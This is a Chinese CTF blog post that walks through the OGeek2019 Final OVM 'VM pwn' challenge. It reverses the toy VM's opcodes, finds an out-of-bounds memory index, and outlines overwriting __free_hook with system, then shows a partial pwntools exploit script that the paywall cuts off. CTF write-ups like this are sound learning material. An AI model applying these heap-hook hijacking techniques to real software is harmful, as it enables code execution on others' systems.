VM pwn入门

最新推荐文章于 2023-12-22 19:53:14 发布
最新推荐文章于 2023-12-22 19:53:14 发布
阅读量2k 收藏 15
点赞数 4
分类专栏: CTF知识学习 文章标签: 堆栈 虚拟机 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/106600382
版权

VM pwn貌似是最近火起来的一类PWN题。最近打的好几场比赛都出现了VM pwn的题目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn题,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn题。本文就主要对这两道题目进行分析。

[OGeek2019 Final]OVM

程序分析

在这里插入图片描述
作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数
本题使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,所以只有16个寄存器,格式如下

操作码 | 目的寄存器编号 | 操作数2寄存器编号 | 操作数1寄存器编号

每个操作码的功能如下:

dst = (a1&0xf0000)>>16
dst = reg[dst]
op2 = (a1&0xf00)>>8
op2 = reg[ope2]
op1 = a1&0xf
op1 = reg[op1]

0x10:
dst = a1&0xff

0x20:
dst = ((a1&0xff)==0)

0x30:
dst = memory[op1]

0x40:
memory[op1] = dst

0x50:
tmp = reg[13]
reg[13]++
stack[tmp] = dst

0x60:
reg[13]--
dst = stack[reg[13]]

0x70:
dst = op1 + op2

0x80:
dst =  op2 - op1

0x90:
dst =  op1 & op2

0xA0:
dst =  op1 | op2

0xB0:
dst = op1 ^ op2

0xC0:
dst =  op2 << op1

0xD0:
dst =  op2 >> op1

0xE0:
running=0
if !reg[13]exit
show all reg

对指令的逆向是一个很费时间的过程,但这是必不可少的,一定要耐心分析每一个操作码的功能
接下来就是分析程序中的漏洞了,可以看到memory并没有对下标大小进行检测,这就有一个数组越界漏洞
在这里插入图片描述

而memory位于0x202060偏移处,在0x202040处正好就有一个指向堆的指针,并且程序结束时允许我们输入0x8c个bytes,如果我们能把这个指针改了,不就能进行一次任意内存写了吗?
而位于0x201FF8偏移处有_IO_2_1_stderr_的地址,该地址+0x10A8即为_free_hook

利用思路

有了上面的分析,我们的利用思路就很清晰了

  1. 利用数组越界获取stderr的地址到reg[2]和reg[3]
  2. 利用0x10(赋值)和0xC0(左移)操作构造出0x10A0
  3. 利用0x70(add)功能让reg中的stderr地址增加0x10A0
  4. 再次利用数组越界把增加之后的地址写到$rebase(0x202040),即comment[0]的位置
  5. 退出运行,先利用泄露的寄存器的值计算libc,然后输入’/bin/sh’+p64(system)即可

Exp

from pwn import *

r = remote("node3.buuoj.cn", 29381)
#r = process("./OGeek2019_Final_OVM")

context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''	
	b *$rebase(0xCFE)
	x/10gx $rebase(0x242060)
	c
	''')

elf = ELF("./OGeek2019_Final_OVM")
libc = ELF('./libc/libc-2.23.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]
success("malloc:"+hex(libc.sym['malloc']))
success("system:"+hex(libc.sym['system']))
success("free_hook:"+hex(libc.sym['__free_hook']))


def code_generate(code, dst, op1, op2):
	res = code<<24
	res += dst<<16
	res += op1<<8
	res += op2
	return res

r.recvuntil("PC: ")
r.sendline('0')
r.recvuntil("SP: ")
r.sendline('1')
r.recvuntil("CODE SIZE: ")
r.sendline('24')
r.recvuntil("CODE: ")
r.sendline(str(code_generate(0x10, 0
最低0.47元/天 解锁文章
L.o.W
关注
  • 4
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
warmup pwn入门
02-11
pwn入门
[OGeek2019 Final]OVM(简易虚拟机逃逸)
m0_51251108的博客
10-16 720
vmpwn入门
【Ubuntu20.04】从零开始配置一台PWN虚拟机
qcwwww的博客
02-06 4256
从镜像网站下载了纯净的ubuntu20.04版本的系统,从零开始配置一台Pwn环境机器。静待安装的结束后,接下来是配置过程:进入清华镜像网站,选择自己所要的的ubuntu版本复制粘贴此时注意,将其中的https改为http,由于证书还未更新,所以先用http访问更新证书后改回 接下来安装证书 更新完后改回 /etc/apt/sources.list 中的https 再执行一下: 此时已经可以安装pip,在终端输入pip,系统提示没有pip也会给出这条安装命令 2 安装gadget插件 one_gadger
[OGeek2019 Final]OVM
weixin_52878095的博客
03-19 3865
静态分析 拿到题目后第一件事先检查程序的保护机制 看到程序除了canary保护以为,其他保护都开了,丢到IDA里面静态分析,程序先是为comment参数分配了一块0x8c大小的内存,然后让我们输入指令起始位置和栈起始位置,然后将指令起始位置赋值给reg[13],将栈起始位置赋值给reg[15],而且指令的数量不能大于0x10000,然后就是需要我们一条一条输入指令,输入完毕后就读取指令并执行,最后会有一个向comment中写入数据然后调用sendcomment函数 然后我们分别看一下fetch() /
VMPWN
Amalllの博客
11-11 1027
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。 2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化 3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环
【八芒星计划】 VM PWN
carol2358的博客
09-01 470
这篇用来记录VM PWN 先申明本篇文章资料来源: https://blog.csdn.net/weixin_44145820/article/details/106600382 https://www.anquanke.com/post/id/208450#h2-1 https://xz.aliyun.com/t/6865 文章目录[OGeek2019 Final]OVM vm pwn最关键的就是逆向相关程序,理解每个指令的作用,漏洞大多数都是数组越界 先介绍一些基础的概念: 1.虚拟机保护技术 所谓
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
welpwn pwn 入门
02-11
pwn 入门
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
easyVM_v0.2
02-26
easyVM是一个简单的虚拟机。0.1版本只支持8086指令集和一些简单的I/O设备,只支持英文文本显示方式。0.2版本主要是在0.1版基础上加了一小部分32位指令(push eax等),使得easyVM可以运行MS-DOS 6.22自带的大部分程序。
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
实用软件资源下载地址集合
热门推荐
青红造了个大白之成长记
07-03 28万+
1、文库、音乐、视频下载类软件:(视频下载软件)稞麦下载地址:http://rj.baidu.com/soft/detail/10712.html?ald维棠下载地址:http://www.vidown.cn/(文档下载软件)冰点文库下载地址:http://rj.baidu.com/soft/detail/23385.html?ald(音频下载软件)酷狗下载地址:http://rj.baidu....
配置pwn环境的虚拟机
yier___的博客
12-22 544
安装完成后,输入python3,然后输入下面这串代码,如果没有报错,像下面这样,则代表安装成功。需要安装pip,之后可以安装python库。输入上面的代码,等待安装。
PWN虚拟机配置过程和遇到的问题记录
m0_58824086的博客
07-23 538
想用 peda-heap:echo “source ~/GDB-Plugins/peda-heap/peda.py” > ~/.gdbinit(感觉这个挺好用的,扩展了 heap 的功能,还保留了 peda 的)想用 pwndbg:echo “source ~/GDB-Plugins/pwndbg/gdbinit.py” > ~/.gdbinit。想用 peda:echo “source ~/GDB-Plugins/peda/peda.py” > ~/.gdbinit。
一道题目入门VMpwn
qq_40712959的博客
04-16 320
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
2021 羊城杯 EasyVM
abelxu
09-14 747
正好学习一下vm的题目怎么分析 1.简单分析 主函数 1.初始化标准输入输出和错误 2.设置VMcontext 3.xxtea自解密dispatch代码 4.进入dispatch执行 2.解决smc问题 在自解密结束位置下断点,并将内容dump下来. dump脚本 start = 0x80487A8 for idx in range(0x1000): if idx%16 == 0: print("") print(hex(get_wide_byte(start+idx)),end=',
BUUCTF [OGeek2019]babyrop
、moddemod
06-09 641
exp from pwn import * from LibcSearcher import * context.log_level = 'debug' p = process('./pwn7') elf = ELF('./pwn7') payload = '\0'.encode().ljust(0x10, bytes([0xff])) p.sendline(payload) p.recvuntil('Correct\n') write_plt = elf.plt['write'] write_...
2019UNCTF easyvm
weixin_43884935的博客
03-14 1055
虚拟机逆向入门----2019UNCTF easyvm 自己也是个萌新,难得做了一道虚拟机逆向的题目,还是想分享出来 看题目知道这是一个虚拟机逆向题目,运行一下知道这是匹配字符串 之后用IDA64进行分析,主函数的逻辑还是比较清楚的。 先给s上的96字节置0,再给v3分配40字节空间。调用sub_400C1E初始化v3上的内容。用s接收32字符,如果不是32长度就失败,如果是,则调用 v3函数指...
ctfshow pwn入门
09-29
ctfshow pwn入门是一个关于ASLR(地址空间布局随机化)的题目。在该题目中,程序会读取系统中/proc/sys/kernel/randomize_va_space文件的内容,如果内容为0,则输出的flag是正确的,否则输出的flag是错误的。所以,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值